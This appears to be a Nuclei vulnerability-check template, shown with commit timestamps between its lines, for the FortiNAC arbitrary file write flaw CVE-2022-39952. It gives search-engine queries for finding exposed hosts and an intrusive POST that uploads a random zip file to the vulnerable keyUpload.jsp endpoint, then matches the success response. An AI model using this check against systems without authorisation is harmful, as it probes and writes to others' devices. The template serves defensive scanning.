2023-02-21 15:47:52 +00:00
id : CVE-2022-39952
info :
2023-03-27 17:46:47 +00:00
name : Fortinet FortiNAC - Arbitrary File Write
2023-02-21 15:47:52 +00:00
author : dwisiswant0
severity : critical
description : |
2023-03-27 17:46:47 +00:00
Fortinet FortiNAC is susceptible to arbitrary file write. An external control of the file name or path can allow an attacker to execute unauthorized code or commands via specifically crafted HTTP request, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. Affected versions are 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, and 8.3.7.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could lead to unauthorized access, data loss.
2023-09-06 11:59:08 +00:00
remediation : Upgrade to 9.4.1, 9.2.6, 9.2.6, 9.1.8, 7.2.0 or above.
2023-02-21 15:47:52 +00:00
reference :
2023-02-24 05:24:03 +00:00
- https://fortiguard.com/psirt/FG-IR-22-300
2023-02-24 06:07:50 +00:00
- https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/
- https://github.com/horizon3ai/CVE-2022-39952
2023-03-27 17:46:47 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-39952
2024-03-23 09:28:19 +00:00
- https://github.com/1f3lse/taiE
2023-03-02 10:57:29 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2022-39952
2024-01-14 13:49:27 +00:00
cwe-id : CWE-668,CWE-73
2024-03-23 09:28:19 +00:00
epss-score : 0.96445
epss-percentile : 0.99548
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:*
2023-02-24 05:01:00 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : fortinet
product : fortinac
2024-06-07 10:04:29 +00:00
shodan-query :
- title:"FortiNAC"
- http.title:"fortinac"
2024-05-31 19:23:20 +00:00
fofa-query : title="fortinac"
google-query : intitle:"fortinac"
2024-01-14 09:21:50 +00:00
tags : cve,cve2022,fortinet,fortinac,fileupload,rce,intrusive
2023-02-21 15:47:52 +00:00
variables :
boundaryId : "{{hex_encode(rand_text_alphanumeric(16))}}"
2023-04-27 04:28:59 +00:00
http :
2023-02-21 15:47:52 +00:00
- method : POST
path :
- "{{BaseURL}}/configWizard/keyUpload.jsp"
2023-07-11 19:49:27 +00:00
2023-02-21 15:47:52 +00:00
body : |
--{{boundaryId}}
Content-Disposition : form-data; name="key"; filename="{{to_lower(rand_text_alphanumeric(8))}}.zip"
2023-02-24 05:01:00 +00:00
{{randstr}}
2023-02-21 15:47:52 +00:00
--{{boundaryId}}--
2023-07-11 19:49:27 +00:00
headers :
Content-Type : "multipart/form-data; boundary={{boundaryId}}"
2023-02-24 10:37:41 +00:00
matchers-condition : and
2023-02-21 15:47:52 +00:00
matchers :
- type : word
part : body
words :
- "zipUploadSuccess"
- "SuccessfulUpload"
condition : and
2023-02-24 05:01:00 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2024-06-08 16:02:17 +00:00
# digest: 4a0a00473045022003035f8cc502ab55a0f9556bca3493ee3a7a220a55bd9d48ff0960e351249c9a022100d929f8578d6b592f54fac3cb3c5a4466c2be8f794e9d11a9172c50150b9426d6:922c64590222798bb761d5b6d8e72950